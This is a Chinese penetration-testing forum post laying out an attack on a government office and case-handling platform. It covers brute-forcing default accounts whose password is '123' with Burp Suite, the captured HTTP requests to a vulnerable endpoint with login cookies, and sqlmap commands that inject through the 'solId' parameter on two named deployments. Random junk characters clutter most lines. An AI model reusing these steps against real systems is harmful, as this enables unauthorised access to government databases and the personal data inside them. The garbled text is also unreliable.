平台简介:
" _0 c- V6 X, n " h1 g( s }( q+ W- y6 S9 L
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!0 s% D9 U) j) ^# ^4 f3 f5 b3 d
2 o) E( A( \: a" e8 ]1 X4 |
% ~7 ` f( q9 G; z6 `, i$ _8 v; [$ B 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
0 u9 g2 @. f! F; y ( u% w7 I( _2 B( o5 n) b t
3 g+ Q5 w. T% T1 _, B& Uhttp://1.1.1.1:7197/cap-aco/#(案例2-)
5 d5 q `. N$ D) ?2 C, h http://www.XXOO.com (案例1-官网网站)
: A/ w5 m& N1 p: \% X& Q! V- @1 \' A6 d( {! z2 ?1 F$ r * C. d+ l# H/ {; B# B2 | F+ q
r' @- M+ X/ U3 R: _* C/ F4 W 漏洞详情:) I* l3 ^$ C9 g- m; \; s0 }
% j0 D- U- D+ F+ M' |* W 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试7 Q6 y4 ?& r+ ^3 K! R. E
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:( W) i5 H" `2 I6 W( q
3 }' G& B2 f3 a- r P) v7 V9 u
) j/ s* S& |0 e3 a y
8 D9 Y0 ~! @% A: h2 `% J% u& K
$ b m3 D+ F& e- {% K2 B% P status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
8 f& ?/ R% f/ s; Q 1、案例1-官方网站 N/ Q! R+ i" p& c {) j& M
# L# `" K5 q+ [- I GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1) m$ v3 N# B8 k7 ~( q! ]( U {1 ]. G Host:
Proxy-Connection: Keep-Alive4 D& }3 k0 A+ L. i7 U: {
B9 G$ E: M- O& w; X* J7 ] Accept: application/json, text/javascript, */*; q=0.017 L/ |7 X- ^) `& m$ I9 ]
' T* D; s; \" X' s: IAccept-Language: zh-CN. {* r; N3 {5 e6 T# c
4 H4 q. t6 L) _: R4 X4 D Content-Type: application/json! a5 N% Z+ g% c3 O( u9 H# u9 c G
" |! p/ g4 T8 m( `3 s6 {/ `0 O! ?" [# C1 u% G User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
; q' _1 r' M, [* N; ]3 [5 P) W/ m2 ?) `! {0 _ X-Requested-With: XMLHttpRequest
( n1 G. |7 Q' y W' d4 G6 i. J0 P" J6 Y ~" _) h8 U Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
( D& s+ b a' E8 V7 _ Accept-Encoding: gzip, deflate, sdch
$ G5 d$ u1 T/ h- }7 A) [+ Y Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e- M6 b! }9 r) I$ r5 L' z3 \
1 d6 ~6 N7 Q6 {8 c+ q) p 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:* O7 r: w9 q; F# P+ E
( v" z$ F7 [. z. p' b
" X5 Y6 h9 T' w) S, ^& S8 W q - K& \: ~ X- Z3 T5 L
" w5 _; B( {8 H& u! E, f% ` . _6 y( g; g$ I; s8 r ?) Y
( m& ~+ g/ }2 q& J+ }) W8 P0 r5 ~& H# A6 D, l- t ' f, N) O8 Z+ j$ j
& [- v# I: u0 D/ n0 q1 d2、案例2-某天河云平台
6 }' G8 L& B) e( @6 y GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1" _) [0 F6 z& f+ m8 U/ d
9 g5 _5 S# E0 U6 _ Host: 1.1.1.:7197% C/ {6 o8 n* y9 [6 K" D
: B- L4 Z0 c5 N: w0 W. R; _ Accept: application/json, text/javascript, */*; q=0.01! [9 n% f6 K0 n& |# {3 N$ k. J
) z) g3 y- Q) q$ J; H( X0 o X-Requested-With: XMLHttpRequest
9 K6 V! z2 G9 Y7 \6 ?( ^User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
. ^+ Z+ M- s- M# m' U( p1 R1 u Content-Type: application/json
; j0 H/ D/ N3 l9 | y& |7 Ehttp://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
4 |0 Y3 \6 A7 Q" D3 t# ` Referer:Accept-Language: zh-CN,zh;q=0.82 k3 ]4 G/ C0 \$ r0 f( |1 [
0 j& ]9 @. @2 P- @ \+ O% A Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
% U! q* K" M8 } YConnection: close+ k1 }+ ~/ b9 l- D) T
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
5 l! }0 O/ ^0 {9 ` Z
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) | Powered by Discuz! X3.2 |